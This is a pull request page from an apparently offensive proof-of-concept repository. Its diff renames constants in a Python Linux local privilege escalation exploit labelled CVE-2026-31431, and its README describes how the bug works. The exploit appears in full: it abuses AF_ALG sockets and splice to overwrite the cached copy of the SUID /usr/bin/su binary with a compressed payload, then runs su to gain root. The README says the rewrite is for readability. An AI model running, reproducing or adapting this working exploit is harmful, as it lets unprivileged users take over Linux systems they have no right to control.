0xvoodoo/PoCs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Increasing Readability #1

Merged
0xvoodoo merged 2 commits from CVE-2026-31431 into main 2026-05-06 03:22:12 +00:00
Conversation 0 Commits 2 Files Changed 2
+11 -9
2 changed files with 11 additions and 9 deletions
Download Patch File Download Diff File Expand all files Collapse all files
CVE-2026-31431/CVE-2026-31431.py
+8 -8
View File
@@ -1,17 +1,17 @@
import os, zlib, socket import os, zlib, socket
def exploit(zlib_payload, su_file, counter): def exploit(payload, su_file, counter):
listener = socket.socket(38, 5, 0) listener = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET)
listener.bind(("aead", "authencesn(hmac(sha256),cbc(aes))")) listener.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
listener.setsockopt(279, 1, bytes.fromhex('0800010000000010'+'0'*64)) listener.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, bytes.fromhex('0800010000000010'+'0'*64))
listener.setsockopt(279, 5, None, 4) listener.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE, None, 4)
connection, _ = listener.accept() connection, _ = listener.accept()
connection.sendmsg([b"A"*4+zlib_payload], [(279, 3, b'\x00'*4), (279, 2, b'\x10'+b'\x00'*19), (279, 4, b'\x08' + b'\x00' * 3),], 32768) connection.sendmsg([b"A"*4+payload], [(socket.SOL_ALG, 3, b'\x00'*4), (socket.SOL_ALG, 2, b'\x10'+b'\x00'*19), (socket.SOL_ALG, 4, b'\x08' + b'\x00' * 3),], 32768)
stdin, stdout = os.pipe() stdin, stdout = os.pipe()
@@ -25,14 +25,14 @@ def exploit(zlib_payload, su_file, counter):
if __name__ == "__main__": if __name__ == "__main__":
zlib_payload = zlib.decompress(bytes.fromhex("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3")) payload = zlib.decompress(bytes.fromhex("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
su_file = os.open("/usr/bin/su", 0) su_file = os.open("/usr/bin/su", 0)
i = 0 i = 0
while i < len(zlib_payload): while i < len(payload):
exploit(zlib_payload[i:i+4], su_file, i) exploit(payload[i:i+4], su_file, i)
i += 4 i += 4
os.system("su") os.system("su")
CVE-2026-31431/README.md
+3 -1
View File
@@ -6,7 +6,9 @@ This exploit has caused quite the panic among defenders, so I re-wrote/unminifie
In short, this exploit abuses the way `splice()` works and the AF_ALG socket type within [authencesn.c](https://github.com/torvalds/linux/blob/26fd6bff2c050196005312d1d306889220952a99/crypto/authencesn.c#L3) from the Linux crypto libraries. More or less, it allows the attacker to write 4 bytes of memory at a time to pagefiles, leading to the overwrite of the in-cache version of open files. When this is done with a SUID binary, like `/bin/su` the attacker is able to then execute the binary, which will pulls from the cache. This leaves the legit version of the overwritten binary in place while allowing arbitrary non-privileged users to gain root perms. In short, this exploit abuses the way `splice()` works and the AF_ALG socket type within [authencesn.c](https://github.com/torvalds/linux/blob/26fd6bff2c050196005312d1d306889220952a99/crypto/authencesn.c#L3) from the Linux crypto libraries. More or less, it allows the attacker to write 4 bytes of memory at a time to pagefiles, leading to the overwrite of the in-cache version of open files. When this is done with a SUID binary, like `/bin/su` the attacker is able to then execute the binary, which will pulls from the cache. This leaves the legit version of the overwritten binary in place while allowing arbitrary non-privileged users to gain root perms.
*Note* - this version needs at least Python 3.10 *Note* - This exploit needs at least Python 3.10
*Additional Note* - For sake of readibility, I've replaced the direct int descriptors with their named socket.* versions, this may slightly reduce portability.
# License # License